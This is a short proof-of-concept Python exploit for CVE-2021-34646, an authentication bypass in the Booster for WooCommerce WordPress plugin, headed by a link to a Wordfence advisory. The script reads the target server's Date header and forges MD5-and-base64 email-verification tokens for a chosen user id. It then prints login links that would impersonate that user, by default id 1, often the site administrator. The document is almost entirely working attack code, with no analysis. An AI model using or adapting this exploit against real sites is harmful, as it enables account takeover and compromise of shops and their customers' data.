Authentication Bypass for Booster for WooCommerce (CVE-2021-34646); https://www.wordfence.com/blog/2021/08/critical-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/

booster_poc.py

import requests,sys,hashlib
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("url", help="the base url")
parser.add_argument('id', type=int, help='the user id', default=1)
args = parser.parse_args()
id = str(args.id)
url = args.url
if args.url[-1] != "/": # needs trailing /
        url = url + "/"

verify_url= url + "?wcj_user_id=" + id
r = requests.get(verify_url)

if r.status_code != 200:
        print("status code != 200")
        print(r.headers)
        sys.exit(-1)

date = r.headers["Date"]
print("Timestamp: " + date)

import datetime
import email.utils
import calendar
def email_time_to_timestamp(s):
    tt = email.utils.parsedate_tz(s)
    if tt is None: return None
    return calendar.timegm(tt) - tt[9]

#t = datetime.datetime.strptime(date,"%a, %d %b %Y %H:%M:%S %Z")
#unix = datetime.datetime.timestamp(t)
#unix = int(unix)
unix = email_time_to_timestamp(date)
print("Timestamp (unix): " + str(unix))

import base64

for i in range(3): # Try multiple timestamps as we don't get the exact hash time
        print("-"+str(i))
        hash = hashlib.md5(str(unix-i).encode()).hexdigest()
        print("Hash: "+hash)
        token='{"id":"'+ id +'","code":"'+hash+'"}'
        token = base64.b64encode(token.encode()).decode()
        token = token.rstrip("=") # remove trailing =
        link = url+"my-account/?wcj_verify_email="+token
        print(link)